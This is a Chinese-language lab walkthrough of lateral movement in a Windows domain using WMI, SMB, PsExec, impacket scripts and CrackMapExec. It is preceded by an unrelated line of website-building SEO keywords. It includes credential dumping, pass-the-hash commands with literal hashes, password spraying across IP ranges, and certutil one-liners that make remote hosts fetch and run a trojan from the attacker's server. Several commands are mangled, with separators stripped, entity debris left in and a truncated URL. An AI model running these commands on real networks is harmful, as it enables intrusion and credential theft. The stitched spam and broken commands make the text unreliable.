做网编去网站还是工作室好,怎么让别人访问我建的网站,唐山哪里建卫星制造基地,网站网页设计屏幕尺寸这里这个环境继续上一篇文章搭建的环境 案例一#xff1a; 域横向移动-WMI-自带命令套件插件
首先上线win2008 首先提权到system权限 wmic是windows自带的命令#xff0c;可以通过135端口进行连接利用#xff0c;只支持明文方式#xff0c;优点是不用上传别…这里这个环境继续上一篇文章搭建的环境 案例一 域横向移动-WMI-自带命令套件插件
首先上线win2008 首先提权到system权限 wmic是windows自带的命令可以通过135端口进行连接利用只支持明文方式优点是不用上传别的东西缺点是无回显。
利用system权限抓取明文密码和hash密码 直接获得了域控管理员的账号密码 探测存活主机 进一步的信息收集上一篇文章写过
win2008开启监听并生成木马上传到本地web服务器 wmic
利用wmic命令去连接别的主机让目标主机去下载木马
wmic /node:目标ip /user:账号 /password:密码 process call create 执行命令
wmic /node:192.168.3.30 /user:administrator /password:admin123 process call create certutil -urlcache -split -f http://192.168.3.20/2.exe 2.exe连接成功一般只有这种显示 成功上传 让他执行 成功上线 缺点就是没有任何回显
cscript
项目地址https://github.com/AA8j/SecTools/tree/main/wmiexec.vbs
特点是会反弹一个新的窗口就导致没有办法在cs当中去运行类似反弹shell并且得借助一个vbs文件且不支持hash 在3.20win2008主机上运行
cscript //nologo wmiexec.vbs /shell 192.168.3.30 账号 密码
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator 123.com 弹过来的新窗口反弹的ip为3.30 wmiexec-impacket
下载地址 1、Py版https://github.com/SecureAuthCorp/impacket python atexec.py god/administrator:Admin12345192.168.3.21 “ver” python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator192.168.3.21 “whoami” 2、Exe版https://gitee.com/RichChigga/impacket-examples-windows 这种方式又拥有回显又可以适配cs
生成代理节点 这里因为我是linux环境直接执行py文件exe文件一个原理
wmiexec ./账号:密码ip 命令
wmiexec 域名/账号:密码ip 命令
wmiexec ./administrator:admin!#45192.168.3.32 whoami 尝试使用域控的hash进行连接 wmiexec -hashes :hash值 (域名或者.)/账号192.168.3.40 whoami
执行上线
proxychains4 python wmiexec.py -hashes :afffeba176210fa/administrator192.168.3.40 certutil -urlcache -split -f h c:/222.exe c:/222.exe案例二: 域横向移动-SMB-自带命令套件插件
利用的是smb开放的445端口
命令
项目地址PsTools - Sysinternals | Microsoft Learn
psexe也是反弹一个cmd所以不能直接在cs当中运行
windows官方用法
psexec64 \\192.168.3.32 -u administrator -p admin!#45 -s cmd这里因为我是linux系统所以我直接把文件拖入win2008进行运行并且运行该文件的时候cmd权限必须为admin这里也可以用socks代理执行并且权限已经是system可以执行。
20执行获得30的cmd 套件
使用套件中的psexec
wmi套件中
psexec.py ./administrator:123.com192.168.3.30
psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator192.168.3.30 套件当中还有一个smbexec.py文件
python smbexec.py ./administrator:123.com192.168.3.40
python smbexec.py -hashes :579da618cfbfa85247acf1f800a280a4 administrator192.168.20.30 同样也是会弹出一个新的cmd会话 cs自带 先需要设置转发上线因为内网不出网 选择域控密码或者主机密码 域控上线 利用psexec64主机hash值上线win7 因为这里我所有主机都是一个密码所以直接选这个记得他会自动加上win2008的域记得删除然后就是提醒我们在内网渗透过程当中要尝试切换域内用户的登录方式大部分会自动加上域 成功上线 案例三 域横向移动-工具-ProxychainsCrackMapExec
这里proxychains我一直在用不做过多介绍了
crackmapexec下载地址kali自带GitHub - byt3bl33d3r/CrackMapExec: A swiss army knife for pentesting networks
基本用法
探测存活主机
crackmapexec smb 192.168.3.10-40 #探测存活主机 密码喷射域登录
crackmapexec smb 192.168.3.10-40 -u jie -p 123.com
这里由于我没有把密码和主机进行绑定所以域内所有主机都可以用这个密码登录 密码喷射本地登录
crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth 密码喷射本地登录加执行命令
crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth -x whoami 尝试上线,记得设置转发上线ip需要设置为内网ip 利用下面的命令下载web服务器中的木马并尝试运行上线
crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com -x certutil -urlcache -split -f http://192.168.3.20/2.exe c:/zzzzz.exe c:/zzzzz.exe除了域控主机之外都上线了切换域控密码喷射 高阶玩法
当收集到一台域内主机以后可以尝试把收集到的密码用户都写入字典当中
注意收集用户的时候不能用提权的账户需要用域内账户 这里密码我基本上都是123.com 运行这里注意要加一个参数不然运行一个成功匹配后就不会继续往下运行
--continue-on-success
用字典密码去匹配 这个加continue参数好像只能够匹配密码不能全上线不加参数的话又指挥上线一个就掉了不太懂了可以匹配出来密码用账号密码一个一个去上线
